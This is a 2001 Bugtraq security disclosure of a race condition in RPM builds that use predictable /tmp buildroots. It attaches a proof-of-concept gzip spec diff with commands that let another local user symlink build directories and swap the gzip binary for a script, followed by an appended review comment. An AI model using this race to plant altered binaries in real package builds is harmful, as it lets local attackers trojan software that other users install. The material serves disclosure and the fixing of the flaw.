Date:         Mon, 19 Mar 2001 18:52:11 +0000
From: Ian Lynagh <igloo@EARTH.LI>
Subject:      RPM building races
To: BUGTRAQ@SECURITYFOCUS.COM



Hi all

Today it became necessary for me to build an RPM for the first time. To
assist my learning I chose, randomly, gzip and had a look at its spec
file in conjunction with reading the various documentation. The first
time I saw the reference to /tmp and /var/tmp I was worried, and still
don't see why ./redhat isn't used in the same way as ./debian/tmp is.
Looking more closely at the spec file I saw

rm -rf $RPM_BUILD_ROOT
%makeinstall  bindir=$RPM_BUILD_ROOT/bin gzip.info
mkdir -p $RPM_BUILD_ROOT/usr/bin

which immediately flashed warning lights about races. In this case

rm -rf $RPM_BUILD_ROOT
mkdir -p `dirname $RPM_BUILD_ROOT`
mkdir $RPM_BUILD_ROOT
%makeinstall  bindir=$RPM_BUILD_ROOT/bin gzip.info
mkdir -p $RPM_BUILD_ROOT/usr/bin

would have been safe (I believe) as the mkdir without -p will fail if
the directory exists. This allows you to alter the files in the package,
for example such that whenever anyone ran the command you got a shell
SUID their UID, if you have a shell on the machine the package is built
on while it is being built. Certainly in the case of gzip this is not
an easy race to exploit, but it exists all the same.

I have attached a patch against gzip-1.3-6 from RedHat which pauses the
build process at various points and lists commands that will build a
gzip RPM in which the gzip binary simply echos foo. To exploit this race
for real is difficult, and you need an account on the machine in
question, but even so I think problems like these should be fixed. There
may also be easier races in other packages. I am not overly familiar
with RPM, but I think the easiest solution would be to set the default
buildroot on all packages to be something like ./rpm-building/%{package}
or, slightly more work, to make sure the buildroot is secure before you
do anything else in there.

I have not given vendors advance warning as their build environments
are presumably secure, while it is the many sysadmins building RPMs
out there on user machines who are the ones under threat.

I haven't looked at other packages or RPM based distributions at all.


Take care
Ian


[Attachment: gzip.spec.diff]

--- gzip.spec.orig	Mon Mar 19 18:18:14 2001
+++ gzip.spec	Mon Mar 19 18:37:55 2001
@@ -32,14 +32,37 @@
 make gzip.info

 %clean
+echo "
+As another user, type
+rm -rf $RPM_BUILD_ROOT
+and press enter"
+read WAIT
 rm -rf $RPM_BUILD_ROOT

 %install
 rm -rf $RPM_BUILD_ROOT
+echo "
+As another user, type
+mkdir -p $RPM_BUILD_ROOT/usr/share/man/man1
+ln -s /tmp $RPM_BUILD_ROOT/usr/share/doc
+mkdir $RPM_BUILD_ROOT/usr/bin
+mkdir $RPM_BUILD_ROOT/bin
+mkdir $RPM_BUILD_ROOT/usr/share/info
+chmod -R a+rwx $RPM_BUILD_ROOT
+and then press enter"
+read WAIT
 %makeinstall  bindir=$RPM_BUILD_ROOT/bin gzip.info
 mkdir -p $RPM_BUILD_ROOT/usr/bin
 ln -sf ../../bin/gzip $RPM_BUILD_ROOT/usr/bin/gzip
 ln -sf ../../bin/gunzip $RPM_BUILD_ROOT/usr/bin/gunzip
+echo "
+As another user, type
+rm -f $RPM_BUILD_ROOT/bin/gzip
+echo #\!/bin/sh > $RPM_BUILD_ROOT/bin/gzip
+echo echo foo >> $RPM_BUILD_ROOT/bin/gzip
+chmod +x $RPM_BUILD_ROOT/bin/gzip
+and then press enter"
+read WAIT

 for i in  zcmp zegrep zforce zless znew gzexe zdiff zfgrep zgrep zmore ; do
     mv $RPM_BUILD_ROOT/bin/$i $RPM_BUILD_ROOT/usr/bin/$i

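Review bot: the third prompt's `echo #\!/bin/sh > $RPM_BUILD_ROOT/bin/gzip` will not write a shebang when typed into a shell, because an unquoted `#` at the start of a word begins a comment and swallows the rest of the line, redirection included; the gzip file is then created by the following `echo echo foo >> ...` with no interpreter line (it still prints foo when run, since a shell falls back to executing an ENOEXEC file as a script). Quote it, e.g. `echo '#!/bin/sh' > $RPM_BUILD_ROOT/bin/gzip`. The three `read WAIT` pauses also assume rpm is run from an interactive terminal; a comment at the top of the spec saying the patch is a demonstration harness, not a fix, would help anyone who applies it by mistake.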